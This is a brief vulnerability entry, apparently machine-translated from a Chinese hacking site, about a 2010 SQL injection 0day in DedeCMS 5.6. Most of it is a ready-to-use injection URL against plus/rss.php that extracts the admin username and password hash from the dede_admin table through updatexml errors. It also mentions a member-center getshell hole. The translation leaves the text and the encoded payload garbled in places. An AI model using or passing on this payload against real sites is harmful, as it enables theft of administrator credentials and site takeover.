dedecms 5. 6 the latest injection 0day vulnerabilities-vulnerability warning-the black bar safety net

2010-08-05T00:00:00
ID MYHACK58:62201027799
Type myhack58
Reporter 佚名
Modified 2010-08-05T00:00:00

Description

Injected code:

uploads/plus/rss. php? tid=1&_Cs[][1]=1&_Cs[2%2 9% 2 9%20AND%2 0% 2 2% 2 7% 2 2%20AND%20updatexml%2 8 1,%28SELECT%20CONCAT%280x5b,uname,0x3a,MID%28pwd,4,1 6% 2 9,0x5d%2 9%20FROM%20dede_admin%29,1%2 9%2 3%2 7][0]=1

Test: Please turn off member registration, member center there getshell vulnerabilities

Note: Starter tools